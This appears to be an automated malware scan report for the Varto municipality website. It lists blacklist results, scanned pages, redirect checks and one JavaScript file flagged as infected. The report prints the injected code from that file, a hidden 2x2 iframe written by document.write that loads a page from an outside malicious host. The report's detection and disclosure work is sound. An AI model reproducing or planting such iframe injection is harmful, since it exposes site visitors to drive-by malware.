Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=varto.bel.tr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://varto.bel.tr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.varto.bel.tr/ | 200 OK Content-Length: 36762 Content-Type: text/html | clean |
http://www.varto.bel.tr/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.varto.bel.tr/modules/mod_lofarticlesslideshow/assets/mod_lofarticlesslideshow_jl15x.js | 200 OK Content-Length: 9594 Content-Type: application/javascript | clean |
http://www.varto.bel.tr/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 2794 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("load",function(){$$('.gk_npro_mainwrap').each(function(c,i){var d=c.getProperty('id');var e=$(d);var f=e.hasClass('hover');var g=false;var h=$Gavick[d];if($E('.gk_npro_full_interface',e)&&$E('.gk_npro_full_scroll1',e)){var l=$E('.gk_npro_full_scroll1',e).getSize().size.x;var m=new Fx.Scroll($E('.gk_npro_full_scroll1',e),{duration:h['animation_speed'],wheelStops:false,wait:false});var n=$ES('.gk_npro_full_tablewrap',e);var o=0;var p=(c.hasClass('autoanim'))?true:false;var document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=249726></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=249726 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=249726> | ||
http://www.varto.bel.tr/index.php | 200 OK Content-Length: 36771 Content-Type: text/html | clean |
http://www.varto.bel.tr/component/contact/1.html | 200 OK Content-Length: 21940 Content-Type: text/html | clean |
http://www.varto.bel.tr/component/search/ | 200 OK Content-Length: 22594 Content-Type: text/html | clean |
http://www.varto.bel.tr/ihale-ilanlari.html | 200 OK Content-Length: 21884 Content-Type: text/html | clean |
http://www.varto.bel.tr/yatirim-ve-projelerimiz.html | 200 OK Content-Length: 21861 Content-Type: text/html | clean |
http://www.varto.bel.tr/meclis-kararlari.html | 200 OK Content-Length: 21796 Content-Type: text/html | clean |
http://www.varto.bel.tr/sosyokulturel-etkinlikler.html | 200 OK Content-Length: 21922 Content-Type: text/html | clean |
http://www.varto.bel.tr/kamu-hizmet-standardi.html | 200 OK Content-Length: 20984 Content-Type: text/html | clean |
http://www.varto.bel.tr/etik-komisyonu.html | 200 OK Content-Length: 37466 Content-Type: text/html | clean |
http://www.varto.bel.tr/iletisim.html | 200 OK Content-Length: 23685 Content-Type: text/html | clean |
http://www.varto.bel.tr/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: varto.bel.tr
Result:
GET / HTTP/1.1
Host: varto.bel.tr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: varto.bel.tr
Referer: http://www.google.com/search?q=varto.bel.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: varto.bel.tr
Referer: http://www.google.com/search?q=varto.bel.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.